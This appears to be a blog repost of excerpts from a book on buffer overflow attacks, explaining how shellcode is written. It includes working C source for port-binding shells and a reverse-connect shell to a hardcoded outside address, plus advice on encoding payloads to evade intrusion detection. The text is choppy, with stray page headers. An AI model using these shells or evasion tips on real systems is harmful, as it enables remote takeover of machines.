IDIOTS GUIDE TO SHELL CODING
From the Book Buffer Overflow Attacks
Remote code execution vulnerabilities can quickly morph into
automated threats such as network-borne viruses or the better
known Internet worms.The Sasser worm, and its worm variants,
turned out to be one of the most devastating and costly worms
ever released in the networked world. It proliferated via a critical
buffer overflow found in multiple Microsoft operating systems.
Worms and worm-variants are some of the most interesting
code released in common times.
Internet worms are comprised of four main components:
■ Vulnerability Scanning
■ Exploitation
■ Proliferation
■ Copying
Given the amount of slang associated with buffer overflows,
we felt it necessary to quickly broach one topic that is
commonly misunderstood. As you’ve probably come to
realize already, buffer overflows are a specific type of
vulnerability and the process of leveraging or utilizing that
vulnerability to penetrate a vulnerable system is referred
to as “exploiting a system.” Exploits are programs that
automatically test a vulnerability and in most cases attempt
to leverage that vulnerability by executing code. Should the
vulnerability be a denial of service, an exploit would attempt
to crash the system. Or, for example, if the vulnerability was
a remotely exploitable buffer overflow, then the exploit would
attempt to overrun a vulnerable target’s bug and spawn a
connecting shell back to the attacking system.
Writing shellcode involves an in-depth understanding of
assembly language for the target architecture in question.
Usually, different shellcode is required for each version of
each operating system in each hardware architecture.
Within shellcode, system calls are used to perform actions.
Therefore, most shellcode is operating as system dependent
because most operating systems use different system calls.
Reusing program code in which the shellcode is injected is
possible but difficult, and not often seen. As you saw in the
previous chapter, it is always recommended that you first
write the shellcode in C using system calls only and then
write it in assembly.
The two common problems that shellcode
must overcome: the addressing problem
and the null byte problem. It concludes
with some examples on writing both
remote and local shellcode for the 32-bit
Intel Architecture (IA32) platform
(also referred to as x86).
Shellcode is the code executed when a vulnerability
has been exploited.
The Tools :
During the shellcode development process, you will need to
make use of many tools to write, compile, convert, test, and
debug the shellcode. Understanding how these tools work
will help you become more efficient in creating shellcode.
The following is a list of the most commonly used tools, with
pointers to more information and downloads.
■ NASM The NASM package contains an assembler named
nasm and a disassembler named ndisasm.
■ GDB GDB is the GNU debugger. In this chapter, we will
mainly use it to analyze core dump files. GDB can also
disassemble functions of compiled code by just using the
command disassemble
to have a look at how to translate your C code to assembly language.
■ ObjDump ObjDump is a tool used to disassemble files and obtain
important information from them.
■ Ktrace The ktrace utility, available on *BSD systems only, enables
kernel trace logging.The tool creates a file named ktrace.out, which
can be viewed by using the kdump utility. Ktrace allows you to see all
system calls a process is using.This can be very useful for debugging
shellcode because ktrace also shows when a system call execution fails.
■ Strace The strace program is very similar to ktrace: it can be used to
trace all system calls a program is issuing. strace is installed on most
Linux systems by default
The Assembly Programming Language
Every processor comes with an instruction set that
can be used to write executable code for that specific
processor type. Using this instruction set, you can
assemble a program that can be executed by the
processor.The instruction sets are processor-type
dependent; you cannot, for example, use the assembly
source of a program that was written for an Intel
Pentium processor on a Sun Sparc platform. Because
assembly is a very low-level programming language,
you can write very tiny and fast programs.In this chapter,
we will demonstrate this by writing a 23-byte piece of
executable code that executes a file. If you write the
same code in C, the end result will be hundreds
of times bigger because of all the extra data added
by the compiler. Also note that the core of most
operating systems is written in assembly. If you
take a look at the Linux and FreeBSD source codes,
you will find that many system calls are written in
assembly. Writing programs in assembly code can be
very efficient, but it also has many disadvantages.
Large programs get very complex and hard to read.
Also, because the assembly code is processor-dependent,
you can’t port it easily to other platforms. It’s difficult to
port assembly code not only to different processors but
also to different operating systems running on the same
processor.This is because programs written in assembly
code often contain hard-coded system calls—functions
provided by the operating system (OS)— and these
differ a lot with each OS.
The Addressing Problem
Normal programs refer to variables and functions using
pointers that are often defined by the compiler or retrieved
from a function such as malloc, which is used to allocate
memory and returns a pointer to this memory. If you write
shellcode, very often you like to refer to a string or other
variable. For example, when you write execve shellcode,
you need a pointer to the string that contains the program
you want to execute. Since shellcode is injected in a program
during runtime, you will have to statically identify the memory
addresses where it is being executed. For example, if the code
contains a string, it will have to determine the memory address
of the string before it can use it. This is a big issue, because if
you want your shellcode to use system calls that require
pointers to arguments, you will have to know where in
memory your argument values are located.The first solution
to this issue is finding out the location of your data on the
stack by using the “call” and “jmp” instructions.
The second solution is to push your arguments on the stack
and then store the value of the stack pointer ESP.
We’ll discuss both solutions.
System Call Numbers
Every system call has a unique number that is known by
the kernel.These numbers are not often displayed in the
system call man pages but can be found in the kernel
sources and header files. On Linux systems, a header file
named syscall.h contains all system call numbers, while
on FreeBSD the system call numbers can be found in the
file unistd.h.
Remote Shellcode
When a host is exploited remotely, a multitude of options
are available to actually gain access to that particular machine.
The first choice is usually to try the vanilla execve code to
see if it works for that particular server. If that server
duplicated the socket descriptors to stdout and stdin,
small execve shellcode will work just fine. Often however,
this is not the case. In this section, we will explore different
shellcode methodologies that apply to remote vulnerabilities.
Port-Binding Shellcode
One of the commonest shellcodes for remote vulnerabilities
simply binds a shell to a high port.This allows an attacker to
create a server on the exploited host that executes a shell
when connected to. By far the most primitive technique,
this is quite easy to implement in shellcode. In C, the code
to create portbinding shellcode looks like.
Example 2.15 Port-Binding Shellcode
1 int main(void)
2 {
3 int new, sockfd = socket(AF_INET, SOCK_STREAM, 0);
4 struct sockaddr_in sin;
5 sin.sin_family = AF_INET;
6 sin.sin_addr.s_addr = 0;
7 sin.sin_port = htons(12345);
8 bind(sockfd, (struct sockaddr *)&sin, sizeof(sin));
9 listen(sockfd, 5);
10 new = accept(sockfd, NULL, 0);
11 for(i = 2; i >= 0; i--)
38 Chapter 2 • Understanding Shellcode
12 dup2(new, i);
13 execl("/bin/sh", "sh", NULL);
14 }
Socket Descriptor Reuse Shellcode
When choosing shellcode for an exploit, you should always assume that a firewall
will be in place with a default deny policy. In this case, port-binding shellcode
usually is not the best choice. A better tactic is to recycle the current
socket descriptor and utilize that socket instead of creating a new one.
In essence, the shellcode iterates through the descriptor table, looking for
the correct socket. If the correct socket is found, the descriptors are duplicated
and a shell is executed.
Local Shellcode
Shellcode that is used for local vulnerabilities is also used for remote vulnerabilities.
The differentiator between local and remote shellcode is the fact that local
shellcode does not perform any network operations whatsoever. Instead, local
shellcode typically executes a shell, escalates privileges, or breaks out of a chroot
jailed shell.
execve Shellcode
The most basic shellcode is execve shellcode. In essence, execve shellcode is
used to execute commands on the exploited system, usually /bin/sh. Execve is
actually a system call provided by the kernel for command execution.
setuid Shellcode
Often when a program is exploited for root privileges, the attacker receives an
euid equal to 0 when what is desired is a uid of 0.To solve this problem, a
simple snippet of shellcode is used to set the uid to 0.
Let’s take a look at the setuid code in C:
int main(void)
{
setuid(0);
}
chroot Shellcode
Some applications are placed in what is called a “chroot jail” during execution.
This chroot jail only allows the application to access a specific directory, setting
the root “/” of the filesystem to the folder that is allowed to be accessed. When
exploiting a program that is placed in a chroot jail, there must be a way to break
out of the jail before attempting to execute the shellcode,
Summary
Assembly language is a key component in creating effective shellcode.The C
programming language generates code that contains all kinds of data that
shouldn’t end up in shellcode.With assembly language, every instruction is
translated literally in executable bits that the processor understands.
Choosing the correct shellcode to compromise and backdoor a host can
often determine the success of an attack.The attacker’s shellcode determines
how easily the exploit is likely to be detected by a network or host-based
IDS/IPS (intrusion detection system/intrusion prevention system).
Solutions Fast Track
Shellcode Overview
Shellcode must be specifically written for individual hardware and
operating system combinations. In general, preassembled shellcode exists
for a variety of Wintel, Solaris SPARC, and x86 architectures, as well as
multiple flavors of Linux.
Numerous tools are available to assist developers and security
researchers for shellcode generation and analysis. A few of the better
tools include NASM, GDB, ObjJump, KTrace, Strace, and Readelf.
Accurate and reliable shellcode should be a requirement for full-fledged
system penetration testing. Simple vulnerability scans fall short of
testing if identified vulnerabilities are not tested and verified.
The Addressing Problem
Statically referencing memory address locations is difficult with
shellcode since memory locations often change on different system
configurations.
Understanding Shellcode • Chapter 2 49
In assembly, “call” is slightly different than “jmp”. When “call” is
referenced, it pushes the stack pointer (ESP) on the stack and then
jumps to the function it received as an argument.
Assembly code is processor-dependent, thereby making it a difficult
process to port shellcode to other platforms.
It’s difficult to not only port assembly code to different processors but
also to different operating systems running on the same processor since
programs written in assembly code often contain hardcoded system
calls.
The Null Byte Problem
Most string functions expect that the strings they are about to process
are terminated by NULL bytes. When your shellcode contains a NULL
byte, this byte will be interpreted as a string terminator, with the result
that the program accepts the shellcode in front of the NULL byte and
discards the rest.
We make the content of EAX 0 (or NULL) by XOR’ring the register
with itself.Then we place “al”, the 8-bit version of EAX, at offset 14 of
our string.
Implementing System Calls
When writing code in assembly for Linux and *BSD, you can call the
kernel to process a system call by using the “int 0x80” instruction.
Every system call has a unique number that is known by the kernel.
These numbers are not often displayed in the system call man pages but
can be found in the kernel sources and header files.
The system call return values are often placed in the EAX register.
However, there are some exceptions, such as the fork() system call on
FreeBSD, which places return values in different registers.
Remote Shellcode
Identical shellcode can be used for both local and remote exploits, the
differentiator being that remote shellcode may perform remote-shellspawning
code and port-binding code.
One of the commonest shellcodes for remote vulnerabilities simply
binds a shell to a high port.This allows an attacker to create a server on
the exploited host that executes a shell when connected to.
When choosing shellcode for an exploit, one should always assume that
a firewall will be in place with a default deny policy. In this case, one
50 Chapter 2 • Understanding Shellcode
Understanding Shellcode • Chapter 2 51
tactic is to recycle the current socket descriptor and utilize that socket
instead of creating a new one.
Local Shellcode
Identical shellcode can be used for both local and remote exploits, the
differentiator being that local shellcode does not perform any network
operations.
Q: Shellcode development looks too hard for me. Are there tools that can generate
this code for me?
A: Yes, there are. Currently, several tools are available that allow you to easily
create shellcode using scripting languages such as Python. In addition, many
Web sites on the Internet have large amounts of different shellcode types
available for download. Googling for “shellcode” is a useful starting point.
Because shellcode is injected in running programs, it has to be written in a special
manner so that it is position-independent.This is necessary because the
memory of a running program changes very quickly; using static memory
addresses in shellcode to, for example, jump to functions or refer to a string, is
not possible.
When shellcode is used to take control of a program, it is first necessary to
get the shellcode in the program’s memory and then to let the program
somehow execute it.This means you will have to sneak it into the program’s
memory, which sometimes requires very creative thinking. For example, a
single-threaded Web server may have data in memory from an old request while
already starting to process a new request. So you might embed the shellcode
with the rest of the payload in the first request while triggering the execution of
it using the second request.
execve Shellcode
The execve shellcode is probably the most used shellcode in the world.The goal
of this shellcode is to let the application into which it is being injected run an
application such as /bin/sh.
Port-Binding Shellcode
Port-binding shellcode is often used to exploit remote program vulnerabilities.
The shellcode opens a port and executes a shell when someone connects to the
port. So, basically, the shellcode is a backdoor on the remote system.
NOTE
Be careful when executing port-binding shellcode! It creates a backdoor
on your system as long as it’s running!
This is the first example where you will see that it is possible to execute
several system calls in a row and how the return value from one system call can
be used as an argument for a second system call.The C code in Example 3.13
does exactly what we would like to do with our port-binding shellcode.
Example 3.13 Binding a Shell
1 #include
2 #include
3 #include
4
5 int soc,cli;
6 struct sockaddr_in serv_addr;
7
8 int main()
9 {
10
11 serv_addr.sin_family=2;
12 serv_addr.sin_addr.s_addr=0;
72 Chapter 3 • Writing Shellcode
13 serv_addr.sin_port=0xAAAA;
14 soc=socket(2,1,0);
15 bind(soc,(struct sockaddr *)&serv_addr,0x10);
16 listen(soc,1);
17 cli=accept(soc,0,0);
18 dup2(cli,0);
19 dup2(cli,1);
20 dup2(cli,2);
21 execve("/bin/sh",0,0);
22 }
Reverse Connection Shellcode
Reverse connection shellcode makes a connection from the hacked system to a
different system where it can be cached with network tools such as netcat. Once
the shellcode is connected, it will spawn an interactive shell.The fact that the
shellcode generates a connection from the hacked machine makes it very useful
for trying to exploit a vulnerability in a server behind a firewall.This kind of
shellcode can also be used for vulnerabilities that cannot be exploited directly.
1 #include
2 #include
3 #include
4
5 int soc,rc;
6 struct sockaddr_in serv_addr;
7
8 int main()
9 {
10
11 serv_addr.sin_family=2;
12 serv_addr.sin_addr.s_addr=0x210c060a;
13 serv_addr.sin_port=0xAAAA; /* port 43690 */
14 soc=socket(2,1,6);
15 rc = connect(soc, (struct sockaddr*)
&serv_addr,0x10);
16 dup2(soc,0);
17 dup2(soc,1);
18 dup2(soc,2);
19 execve("/bin/sh",0,0);
20 }
As you can see, this code is very similar to the port-binding C implementation,
except that we replace the bind and accept system calls with a connect
system call.
Socket Reusing Shellcode
Port-binding shellcode is very useful for some remote vulnerabilities, but is
often too large and not very efficient.This is especially true when exploiting a
remote vulnerability to which you have to make a connection.With socket
reusing shellcode, this connection can be reused, which saves a lot of code and
increases the chance that your exploit will work.
Encoding Shellcode
Shellcode encoding has been gaining popularity for purely malicious technical
reasons. In this technique, the exploit encodes the shellcode and places a
decoder in front of the shellcode. Once executed, the decoder decodes the
shellcode and jumps to it.
When the exploit encodes your shellcode with a different value every time
it is executed and uses a decoder that is created on-the-fly, your payload
becomes polymorphic and almost no IDS will be able to detect it. Some IDS
plug-ins have the ability to decode encoded shellcode. However, with this said
these systems systems are extremely CPU intensive and are not widely deployed
on the Internet or through enterprise environments.
Reusing Program Variables
Sometimes a program allows you to store and execute only a very tiny shellcode.
In such cases, you may want to reuse variables or strings that are declared
in the program.This results in very small shellcode and increases the chance that
your exploit will work.
One major drawback of reusing program variables is that the exploit will
only work with the same versions of the program that have been compiled with
the same compiler. For example, an exploit reusing variables and written for a
program on Red Hat Linux 9.0 probably won’t work for the same program on
Red Hat 6.2.
OS-Spanning Shellcode
The main advantage of using shellcode that runs on multiple OSs is that you
only have to use one shellcode array in your exploit so that payload, except for
length and return addresses, will always be the same.The main disadvantage of
multi-OS shellcode is that you will always have to determine on what operating
system your shellcode is executed.
To find out whether your shellcode is executed on a BSD or Linux system
is fairly easy. Just execute a system call that exists on both systems but that performs
a completely different task and then analyze the return value. In the case
of Linux and FreeBSD, system call 39 is interesting. In Linux, this system call
stands for mkdir, and in FreeBSD it stands for getppid.
Understanding Existing Shellcode
Now that you know how shellcode is developed, you will probably also want to
learn how you can reverse-engineer shellcode.
Summary
The best of the best shellcode can be written to execute on multiple platforms
while still being efficient code. Such OS-spanning code is more difficult to
write and test; however, shellcode created with this advantage can be extremely
useful for creating applications that can execute commands or create shells on a
variety of systems quickly.The Slapper example analyzes the actual shellcode
utilized in the infamous and quite malicious Slapper worm that quickly spread
throughout the Internet in mere hours, finding and exploiting vulnerable systems.
Using this shellcode as an example, it became quickly apparent when we
were searching for relevant code which examples we could utilize.
Solutions Fast Track
Shellcode Examples
Shellcode must be written for different operating platforms; the
underlying hardware and software configurations determine what
assembly language must be utilized to create the shellcode.
In order to compile the shellcode, you have to install nasm on a test
system. nasm allows you to compile the assembly code so you can
convert it to a string and use it in an exploit.
The file descriptors 0, 1, and 2 are used for stdin, stdout, and stderr,
respectively.These are special file descriptors that can be used to read
data and to write normal and error messages.
The execve shellcode is probably the most used shellcode in the world.
The goal of this shellcode is to let the application into which it is being
injected run an application such as /bin/sh.
Shellcode encoding has been gaining popularity. In this technique, the
exploit encodes the shellcode and places a decoder in front of the
shellcode. Once executed, the decoder decodes the shellcode and jumps
to it.
Reusing Program Variables
It is very important to know that once a shellcode is executed within a
program, it can take control of all file descriptors used by that program.
One major drawback of reusing program variables is that the exploit
will only work with the same versions of the program that have been
compiled with the same compiler. For example, an exploit reusing
112 Chapter 3 • Writing Shellcode
Writing Shellcode • Chapter 3 113
variables and written for a program on Red Hat Linux 9.0 probably
won’t work for the same program on Red Hat 6.2.
OS-Spanning Shellcode
The main advantage of using shellcode that runs on multiple Oss is that
you only have to use one shellcode array in your exploit.Thus, that
payload, except for length and return addresses, will always be the same.
The main disadvantage of multi-OS shellcode is that you always have
to determine on what operating system your shellcode is executed.
To find out whether your shellcode is executed on a BSD or Linux
system is fairly easy. Just execute a system call that exists on both
systems but that performs a completely different task and then analyze
the return value.
Understanding Existing Shellcode
Disassemblers are extremely valuable tools that can be utilized to assist
in the creation and analysis of custom shellcode.
With its custom 80x86 assembler, nasm is an excellent tool for creating
and modify shellcode.
Q: Can an IDS detect polymorphic shellcode?
A: Several security vendors are working on, or already have, products that can
detect polymorphic shellcode. However, the methods they use to do this are
still very CPU-consuming and therefore aren’t often implemented on customer
sites. So encoded and polymorphic shellcode will lower the risk that
shellcode is picked up by an IDS.
Q: Can I spoof my address during an exploit that uses reverse port-binding
shellcode?
A: It would be hard if your exploit has the reverse shellcode. Our shellcode
uses TCP to make the connection. If you control a machine that is between
the hacked system and the target IP that you have used in the shellcode,
then it might be possible to send spoofed TCP packets that cause commands
to be executed on the target.This is extremely difficult, however, and
in general you cannot spoof the address used in the TCP connect back
shellcode.
No comments:
Post a Comment